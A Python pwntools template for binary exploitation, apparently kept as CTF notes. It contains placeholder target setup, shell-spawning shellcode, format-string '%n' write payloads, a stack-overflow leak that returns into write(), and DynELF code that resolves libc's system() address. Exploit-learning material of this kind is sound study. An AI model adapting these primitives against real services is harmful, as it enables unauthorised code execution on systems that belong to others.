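# coding: utf-8
# (the coding declaration only takes effect on line 1 or 2 — PEP 263)
# x86 ebp e
# x64 RDI,RSI,RDX,RCX,R8,R9
from pwn import *  # must come before any use of context / asm / remote / ELF

# --- target setup ---------------------------------------------------------
# Typographic quotes (‘ ’ “ ”) from the original notes are not valid Python
# string delimiters; all literals below use plain ASCII quotes.
context(os='linux', arch='amd64')
context(arch='i386')  # 32-bit x86 is 'i386' in pwntools; 'amd32' is not a known arch
shellcode = asm(shellcraft.sh())
context.log_level = 'DEBUG'

# Pick ONE of the two: remote target or local process. 'xxx' / xxx are placeholders
# (the remote port must be an integer).
s = remote('xxx', xxx)
s = process('./xxx')
gdb.attach(s)

elf = ELF('./xxxx')
plt = elf.plt['xxx']
got = elf.got['xxx']
symbols = elf.symbols['']  # placeholder symbol name
# recvuntil() keeps the delimiter; int() tolerates the trailing '\n'
addr = int(s.recvuntil('\n'), 16)

# --- format-string payload examples -----------------------------------------
payload = "aaaa_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x"
payload = "%85c%7$n"

# --- tube I/O reminders -----------------------------------------------------
s.recv()
s.recvuntil('xxx')
s.send()      # placeholder: send(data) requires the payload as its argument
s.sendline()
s.interactive()
s.close()
raw_input('#')  # Python 2 only; on Python 3 use input('#') (or pwntools' pause())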
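# --- DynELF ------------------------------------------------------------------
# DynELF resolves library symbols at runtime from a memory-read primitive.
# Each `leak(addr)` below is the callback DynELF invokes repeatedly; it is
# expected to return the bytes read at *addr* (None when nothing came back).
# The two variants are alternatives — the second definition shadows the first,
# so keep only the one that fits the target.
# Globals used here (`s`, `padding`, `write_addr`, `start_addr`, `elf`) are
# set up earlier in the notes.


def leak(addr):
    """Read 8 bytes at *addr* by returning into write(1, addr, 8) on a 32-bit stack.

    Args:
        addr: address to read from.

    Returns:
        Up to 8 bytes received back from the target (may be shorter or empty
        if the target sent less than 8 bytes).
    """
    payload = b''
    payload += b'A' * padding      # padding up to the saved return address
    payload += p32(write_addr)     # call write
    payload += p32(start_addr)     # write returns to start
    payload += p32(1)              # write arg 1: fd (1 = stdout)
    payload += p32(addr)           # write arg 2: buf
    payload += p32(8)              # write arg 3: size
    s.sendline(payload)
    content = s.recv()[:8]
    # enhex() works on both Python 2 str and Python 3 bytes, unlike
    # str.encode('hex'), which is Python 2 only.
    print("%#x -> %s" % (addr, enhex(content or b'')))
    return content


# The callback must exist before DynELF is constructed (define-before-use).
d = DynELF(leak, elf=elf)


def leak(addr):  # NOTE: redefinition — shadows the write()-based variant above
    """Skeleton leak callback: send a payload containing *addr*, return the raw reply.

    The empty b"" prefix/suffix are placeholders for whatever the target's
    input format requires around the packed address.
    """
    payload2leak_addr = b"" + pack(addr) + b""
    s.send(payload2leak_addr)
    data = s.recv()
    return data


# Alternative constructor: `pointer` is an address inside the loaded ELF,
# `elf` its ELF object. Both right-hand names are placeholders.
d = DynELF(leak, pointer=pointer_into_ELF_file, elf=ELFObject)
# lookup() takes the library by name as a string (a bare `libc` would be an
# undefined name); the two lines below are the same call.
system_addr = d.lookup("system", 'libc')
system_addr = d.lookup('system', 'libc')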